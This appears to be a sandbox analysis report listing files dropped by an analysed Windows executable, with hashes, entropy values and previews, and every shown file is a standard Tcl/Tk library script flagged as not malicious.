                                                                                                                                                                                                                              SSDEEP:96:n9MEBGkFKT4YHCDhxqEMk0yOC2xXLtSRoxwKl9zFAWx2yuV9cDcwRjnWNQuNFNfO:T0rm8IONoRkN1w+jRQ/FoxrRHRJP
                                                                                                                                                                                                                              MD5:C69A904A57FDC95520086E9DDFED362C
                                                                                                                                                                                                                              SHA1:F0220602ABE91FE563E5AA6A4EA4AB43818C0CFC
                                                                                                                                                                                                                              SHA-256:F0D310A2EE9C0AF928D822CBB39BCBE54FB2C1C95EE8167DFFD55EDC1B2FE040
                                                                                                                                                                                                                              SHA-512:808B82F29B7BA06AF5AE44C6C23EC8DD743E93B391F060C7586D6D3FF26C97294BD11AD215848EBA422491BD50C4509330DD24C83134C7A384E81304133CAADB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "&About..." "\u041f\u0440\u043e...".. ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b".. ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435".. ::msgcat::mcset ru "&Apply" "&\u041f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c".. ::msgcat::mcset ru "Bold" "Bold".. ::msgcat::mcset ru "Bold Italic" "Bold Italic".. ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439".. ::msgcat::mcset ru "Cancel" "\u041e\u0442\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430".. ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \....."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u043
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3908
                                                                                                                                                                                                                              Entropy (8bit):4.658068191079967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nT8A5cbwKmtI1sE9xt6BDyepTr2iiK/yGqXZlBp9:nD5cb2extDepTCnVpJ9
                                                                                                                                                                                                                              MD5:1D085A672A6FCDECEF5D7D876E4C74A3
                                                                                                                                                                                                                              SHA1:1A40C03F15A6926359CA3E5C0A809485CAD28AEE
                                                                                                                                                                                                                              SHA-256:A6821A13D34FB31F1827294B82C4BF9586BB255CA14F78C3ACE11181F42EF211
                                                                                                                                                                                                                              SHA-512:981EDEEF5E4C915BB8F10044096B412D1855CAD08F98A448C6C0A49A54222945EBD102DDCB9525535E0FB19313C319155FA59384605B2C36CC8B4A58693D57E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset sv "&Abort" "&Avsluta".. ::msgcat::mcset sv "&About..." "&Om...".. ::msgcat::mcset sv "All Files" "Samtliga filer".. ::msgcat::mcset sv "Application Error" "Programfel".. ::msgcat::mcset sv "&Blue" "&Bl\u00e5".. ::msgcat::mcset sv "Cancel" "Avbryt".. ::msgcat::mcset sv "&Cancel" "&Avbryt".. ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.".. ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp".. ::msgcat::mcset sv "Cl&ear" "&Radera".. ::msgcat::mcset sv "&Clear Console" "&Radera konsollen".. ::msgcat::mcset sv "Color" "F\u00e4rg".. ::msgcat::mcset sv "Console" "Konsoll".. ::msgcat::mcset sv "&Copy" "&Kopiera".. ::msgcat::mcset sv "Cu&t" "Klipp u&t".. ::msgcat::mcset sv "&Delete" "&Radera".. ::msgcat::mcset sv "Details >>" "Detaljer >>".. ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mapp
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4951
                                                                                                                                                                                                                              Entropy (8bit):5.319678095131993
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nnIoT3wHqLHQslojYhOvZSVGNUpi6Zz0qBAE9A+uiTrBsyqCgnPLz:nnIoT3wHU/osIAwNILt0HE2oV6CgPLz
                                                                                                                                                                                                                              MD5:1435107EB17A09E4AD7277FFA1C76913
                                                                                                                                                                                                                              SHA1:9990C26829275F16C6FC494D32C4298EC541E7D3
                                                                                                                                                                                                                              SHA-256:B6802B7B080A2D8BC3D81614EC55A609CB5EF673C7A81E93E07925D6710F90DD
                                                                                                                                                                                                                              SHA-512:4B2CAE4FA135411761D5B7CBFFABCE87D745A9B6496C7FD7C4AF10E76EE36E51CA62A1417CF6C27070EFF9539A305BE45C010AE4F8532C8C2D915FA101F5157E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset zh_cn "&Abort" "&..".. ::msgcat::mcset zh_cn "&About..." "&....".. ::msgcat::mcset zh_cn "All Files" "....".. ::msgcat::mcset zh_cn "Application Error" "......".. ::msgcat::mcset zh_cn "&Apply" "&..".. ::msgcat::mcset zh_cn "Bold" "..".. ::msgcat::mcset zh_cn "Bold Italic" "....".. ::msgcat::mcset zh_cn "&Blue" "&..".. ::msgcat::mcset zh_cn "Cancel" "..".. ::msgcat::mcset zh_cn "&Cancel" "&..".. ::msgcat::mcset zh_cn "Cannot change to the directory \"%1\$s\".\nPermission denied." "...... \"%1\$s\".\n......".. ::msgcat::mcset zh_cn "Choose Directory" ".....".. ::msgcat::mcset zh_cn "Cl&ear" ".&.".. ::msgcat::mcset zh_cn "&Clear Console" "&....".. ::msgcat::mcset zh_cn "Color" "..".. ::msgcat::mcset zh_cn "Console" "..".. ::msgcat::mcset zh_cn "&Copy" "&..".. ::msgcat::mcset zh
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5772
                                                                                                                                                                                                                              Entropy (8bit):5.038729016734604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:onzxtm7EMgdMjwPqeuAmz9LD1kFIQETZqoIK/RLf7w:ozxtm7qUwi79l0sZqoBJLDw
                                                                                                                                                                                                                              MD5:FC9E03823BEB08DAF7681C09D106DF7D
                                                                                                                                                                                                                              SHA1:7D06FC8F98140E0FFAA2571BD522FC772E58DE54
                                                                                                                                                                                                                              SHA-256:540EEECBA17207A56290BAFFDAE882BBD4F88364791204AD5D14C7BEDD022CCC
                                                                                                                                                                                                                              SHA-512:2B5BAD311A703A0FE2ED67ACE311BAD4C767BCD23DFC3D9ABDF5C3604146A6A15D6BD13A14BDEFCDB2B602C708AACFAB404E96FCBA7C546AD0DAECD4BE2EB34A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# obsolete.tcl --..#..# This file contains obsolete procedures that people really shouldn't..# be using anymore, but which are kept around for backward compatibility...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# The procedures below are here strictly for backward compatibility with..# Tk version 3.6 and earlier. The procedures are no longer needed, so..# they are no-ops. You should not use these procedures anymore, since..# they may be removed in some future release.....proc tk_menuBar args {}..proc tk_bindForTraversal args {}....# ::tk::classic::restore --..#..# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic..# Tk widgets...#..# The value following an 'option add' call is the new 8.5 value...#..namespace eval ::tk::classic {.. # This may need t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1629
                                                                                                                                                                                                                              Entropy (8bit):4.784780799273752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:g2hBuOrlkBytcqYXRE5fvvXq1EhJPqOj6Wf0cVlN:gQ6q4E5HCqhBqOhcaD
                                                                                                                                                                                                                              MD5:9B7A8FD2C6B538FF31BDC380452C6DE3
                                                                                                                                                                                                                              SHA1:3F915BFE85CED9F6C7E9A352718770E9F14F098E
                                                                                                                                                                                                                              SHA-256:40CA505C9784B0767D4854485C5C311829594A4FCBDFD7251E60E6BB7EA74FD1
                                                                                                                                                                                                                              SHA-512:43937152B844BE1E597E99DA1270E54AB1D572AE89CB759E6D41C18C9C8044CCC15A6925F9C5AF617AE9EC1404E78C2733231F4D5C6CFE4D23C546387B1FC328
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# optMenu.tcl --..#..# This file defines the procedure tk_optionMenu, which creates..# an option button and its associated menu...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_optionMenu --..# This procedure creates an option button named $w and an associated..# menu. Together they provide the functionality of Motif option menus:..# they can be used to select one of many values, and the current value..# appears in the global variable varName, as well as in the text of..# the option menubutton. The name of the menu is returned as the..# procedure's result, so that the caller can use it to change configuration..# options on the menu or otherwise manipulate it...#..# Arguments:..# w -...The name to use for the menubutton...# varName -..Global variable to hold the currently
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8418
                                                                                                                                                                                                                              Entropy (8bit):4.964814946573677
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HWh/x+hFMyTA/CTzxFoUuliRLDm8pQrQlENPyF3o48M6C:HWL+MyTA/CTzvAiRqyEw3ok
                                                                                                                                                                                                                              MD5:4CE08A10CD9AE941654B8C679DF669F3
                                                                                                                                                                                                                              SHA1:F1288BABCA698FD18C3BD221E6AE6C02F2975AAE
                                                                                                                                                                                                                              SHA-256:849B4C57E4644E51BEAEAEB3AE59B7FF067E582ECD10F1B2CAF6B6E72F11F506
                                                                                                                                                                                                                              SHA-512:0F37539DA3540E9B1DA7B0377E3BBB359B71DB4271D63BC9501E95931B4E609E8CB91DC2F7B08A6452598D4A0D58C6A2034049A215000EEF0F93A9963D003632
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# palette.tcl --..#..# This file contains procedures that change the color palette used..# by Tk...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_setPalette --..# Changes the default color scheme for a Tk application by setting..# default colors in the option database and by modifying all of the..# color options for existing widgets that have the default value...#..# Arguments:..# The arguments consist of either a single color name, which..# will be used as the new background color (all other colors will..# be computed from this) or an even number of values consisting of..# option names and values. The name for an option is the one used..# for the option database, such as activeForeground, not -activeforeground.....proc ::tk_setPalette {args} {.. if {[winfo depth .] == 1} {...# Just return on monochrome displays, otherwise errors
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5370
                                                                                                                                                                                                                              Entropy (8bit):4.979530133775421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ssAXzkTQ9w5fLQYkJLZkRXKUXfwyZTq2sz8j2Em3YKhrYK:jAXgE0DQpJLGR6UXfpqnzG3m3YKhrYK
                                                                                                                                                                                                                              MD5:286C01A1B12261BC47F5659FD1627ABD
                                                                                                                                                                                                                              SHA1:4CA36795CAB6DFE0BBBA30BB88A2AB71A0896642
                                                                                                                                                                                                                              SHA-256:AA4F87E41AC8297F51150F2A9F787607690D01793456B93F0939C54D394731F9
                                                                                                                                                                                                                              SHA-512:D54D5A89B7408A9724A1CA1387F6473BDAD33885194B2EC5A524C7853A297FD65CE2A57F571C51DB718F6A00DCE845DE8CF5F51698F926E54ED72CDC81BCFE54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# panedwindow.tcl --..#..# This file defines the default bindings for Tk panedwindow widgets and..# provides procedures that help in implementing those bindings.....bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }..bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }....bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }..bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }....bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}..bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}....bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }....bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }....# Initialize namespace..namespace eval ::tk::panedwindow {}....# ::tk::panedwindow::MarkSash --..#..# Handle marking the correct sash for possible dragging..#..# Arguments:..# w..the widget..# x..widget local x coord..# y..widget local y coord..# proxy.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):376
                                                                                                                                                                                                                              Entropy (8bit):5.040809246948068
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:CsUgabAOgjDnzJNBc6ynID/cL4RpncleXN17MQ9PCSIBIQ08hof7MQ9PCSIBIQei:lGbyntNO6LYZliCNBIUhkCNBIFi
                                                                                                                                                                                                                              MD5:8A0517A7A4C70111080ED934329E2BC5
                                                                                                                                                                                                                              SHA1:5B465E0D3500A8F04EE1C705662032F44E2ED0D2
                                                                                                                                                                                                                              SHA-256:A5D208887A94832328C3A33928A80F3B46AA205C20DB4F050A47D940E94071B4
                                                                                                                                                                                                                              SHA-512:D9F502A006A5E0514FD61426818AD1F4168E449588F9D383D6B0BF87A18BE82C420863A9A28E1BEB441284A0B1BC2A0B3D3276A0FE3196341AEC15A27920DE5D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:if {![package vsatisfies [package provide Tcl] 8.6.0]} return..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...|| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin libtk8.6.dll]]..} else {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin tk86t.dll]]..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7632
                                                                                                                                                                                                                              Entropy (8bit):4.891666209090638
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Eet0t8bm9Z+Yjo+j/YKOtOUOtk8XKUal320:EetG8biZZs+bIAUoxX0d
                                                                                                                                                                                                                              MD5:21A3AC11146EC26784C0E729D8D644D0
                                                                                                                                                                                                                              SHA1:C7E0918E8692C42C1D1DD1BBCBFFF22A85979B69
                                                                                                                                                                                                                              SHA-256:579701605669AADFFBCDB7E3545C68442495428EE6E93C2D3A3133583BCD3D33
                                                                                                                                                                                                                              SHA-512:724ED83B989AD9033BEC4211EE50E4C9E85B51054C518CDF7E02D0ED0416F636B9F38C0B0D29F8F4F7F465B77C7D2E01D0918D2C2C3FEC4C7739EA982302FA2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# safetk.tcl --..#..# Support procs to use Tk in safe interpreters...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# see safetk.n for documentation....#..#..# Note: It is now ok to let untrusted code being executed..# between the creation of the interp and the actual loading..# of Tk in that interp because the C side Tk_Init will..# now look up the parent interp and ask its safe::TkInit..# for the actual parameters to use for it's initialization (if allowed),..# not relying on the child state...#....# We use opt (optional arguments parsing)..package require opt 0.4.1;....namespace eval ::safe {.... # counter for safe toplevels.. variable tkSafeId 0..}....#..# tkInterpInit : prepare the child interpreter for tk loading..# most of the real job is done by loadTk..# returns the child name (tkInterpInit
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8693
                                                                                                                                                                                                                              Entropy (8bit):4.968450834020619
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GSusE8YOdpO4aDtao+QYa6t2jooB6ajpaqa5xQGmLGKOC9dLrVx:KsbYQO48t+QYa+NkFjpagGmKKX9dLrVx
                                                                                                                                                                                                                              MD5:D45202D3D2D052D4C6BFE8D1322AAB39
                                                                                                                                                                                                                              SHA1:8CDF184AC2E9299B2B2A107A64E9D1803AA298DE
                                                                                                                                                                                                                              SHA-256:0747A387FDD1B2C7135ECEAE7B392ED52E1D1EBF3FFA90FEBE886DBC0981EB74
                                                                                                                                                                                                                              SHA-512:27B005F955BAE00D15C4492E7BD3EBDC5EE3BF9C164C418198B4BD185709C8810AA6CF76CBCC07EEB4C1D20F8C76EF8DF8B219563C18B88C94954C910BFF575D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# scale.tcl --..#..# This file defines the default bindings for Tk scale widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for entries...#-------------------------------------------------------------------------....# Standard Motif bindings:....bind Scale <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. tk::ScaleActivate %W %x %y..}..bind Scale <Motion> {.. tk::ScaleActivate %W %x %y..}..bind Scale <Leave> {.. if {$tk_strictMotif} {...%W configure -activebackground
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13188
                                                                                                                                                                                                                              Entropy (8bit):5.063842571848725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Gf7RV8ei32PHKT8H2wwucyRlXn+kl1nBKp4nu5FCyK:2mei3qHKT8WPurnXn+I1nBg4nu5MyK
                                                                                                                                                                                                                              MD5:5249CD1E97E48E3D6DEC15E70B9D7792
                                                                                                                                                                                                                              SHA1:612E021BA25B5E512A0DFD48B6E77FC72894A6B9
                                                                                                                                                                                                                              SHA-256:EEC90404F702D3CFBFAEC0F13BF5ED1EBEB736BEE12D7E69770181A25401C61F
                                                                                                                                                                                                                              SHA-512:E4E0AB15EB9B3118C30CD2FF8E5AF87C549EAA9B640FFD809A928D96B4ADDEFB9D25EFDD1090FBD0019129CDF355BB2F277BC7194001BA1D2ED4A581110CEAFC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# scrlbar.tcl --..#..# This file defines the default bindings for Tk scrollbar widgets...# It also provides procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for scrollbars...#-------------------------------------------------------------------------....# Standard Motif bindings:..if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {....bind Scrollbar <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. %W activate [%W identify %x %y]..}..bind Scrollbar <Motion> {.. %W activate [%
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16543
                                                                                                                                                                                                                              Entropy (8bit):5.034958189335699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:IMpfyeKu9TzD0E8+9T1wqBaQKpiqQr7E32fnzXfWJU:IMpfyeKu9Tx8WODTp2zPP
                                                                                                                                                                                                                              MD5:EAA36F0AA69AE19DDBDD0448FBAD9D4D
                                                                                                                                                                                                                              SHA1:EB0ADB4F4D937BAC2F17480ADAF6F948262E754D
                                                                                                                                                                                                                              SHA-256:747889C3086C917A34554A9DC495BC0C08A03FD3A5828353ED2A64B97F376835
                                                                                                                                                                                                                              SHA-512:C8368F19EC6842ED67073B9FC9C9274107E643324CB23B28C54DF63FB720F63B043281B30DBEA053D08481B0442A87465F715A8AA0711B01CE83FF7B9F8A4F4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# spinbox.tcl --..#..# This file defines the default bindings for Tk spinbox widgets and provides..# procedures that help in implementing those bindings. The spinbox builds..# off the entry widget, so it can reuse Entry bindings and procedures...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1999-2000 Jeffrey Hobbs..# Copyright (c) 2000 Ajuba Solutions..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20523
                                                                                                                                                                                                                              Entropy (8bit):4.786929402401609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:eeVL0UI9Ms++J7VT/hc+ISyNsATbOan/uW/UFQ1gs1gxtKZufe2SvdJcmq/YbhEB:eeF0UI9Ms++J7VT/hc+ISyCATbOan2W+
                                                                                                                                                                                                                              MD5:9378397DD3DCA9DFB181F6F512B15631
                                                                                                                                                                                                                              SHA1:4F95DD6B658B6A912725DC7D6226F8414020D6C7
                                                                                                                                                                                                                              SHA-256:B04B1A675572E6FCD12C5FE82C4FD0930395548436FF93D848BF340AE202E7E3
                                                                                                                                                                                                                              SHA-512:D28CC3C8F3D0B1B2371CBD9EE29AC6881BABD8A07C762FF8F3284449998EE44FA44752CC8AB0DE47A3492776CE1D13BC8EA18CFDBDF710639D2D62D02CB917A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]]..set auto_index(::tk::ButtonAutoInvoke) [list sou
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5309
                                                                                                                                                                                                                              Entropy (8bit):4.74935501162253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:wfQXIqAv6iEwYtKVlPBnXWASbvMsDjXKpQQkK2tTsSZQ7Fowqm2K5r:wf+IqI6iU43PJYbvMsDjXKpsK2tISyZV
                                                                                                                                                                                                                              MD5:5F042DE8AD8941C7B9EF6D7BE06C86E4
                                                                                                                                                                                                                              SHA1:A4DFCEA2ACCAC2E85EAAA186DC765086D1E3AA3C
                                                                                                                                                                                                                              SHA-256:A4A8568633F827B54326640E6D1C3FDE4978EDC9E9FA1FB1D7B58F189DF1B1DC
                                                                                                                                                                                                                              SHA-512:E92A00028696A1557666CAB1C25AE6B63F25D75A9811BFAC56DFC069ECC769CC751B71CC81FA85C9CDE8F7FB6D7121EB64B58548CEE8AFE3F6C4A5C243507216
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tearoff.tcl --..#..# This file contains procedures that implement tear-off menus...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk::TearoffMenu --..# Given the name of a menu, this procedure creates a torn-off menu..# that is identical to the given menu (including nested submenus)...# The new torn-off menu exists as a toplevel window managed by the..# window manager. The return value is the name of the new menu...# The window is created at the point specified by x and y..#..# Arguments:..# w -...The menu to be torn-off (duplicated)...# x -...x coordinate where window is created..# y -...y coordinate where window is created....proc ::tk::TearOffMenu {w {x 0} {y 0}} {.. # Find a unique name to use for the torn-off menu. Find the first.. # ancestor of w that is a
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):34969
                                                                                                                                                                                                                              Entropy (8bit):4.95825801435303
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:Rp4LaQDlOrqquMwIMyv4Et8avJLgmTGXs1bYMeNnnZl8n6KRD:RYK8aymTGs1b0xncn6KR
                                                                                                                                                                                                                              MD5:9CA5094ED6FE46620ABF090BF8E2AE63
                                                                                                                                                                                                                              SHA1:60DC3C2E3F69CE5B6DB4F2B3A1F3C109D766BC63
                                                                                                                                                                                                                              SHA-256:AB88556E349F03BACA2D8DC2121071A4F299DB86F484CAB2D9249FF4C7007564
                                                                                                                                                                                                                              SHA-512:0B0C20A754BE744A7FA214BA06AB0744A9BC466D51F96310D97EA1E61119A8ACFEF24E6DC5C4EBDD2C126BF84ACE74FFE622E9641C87E5A240DD13D1F7B5E6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
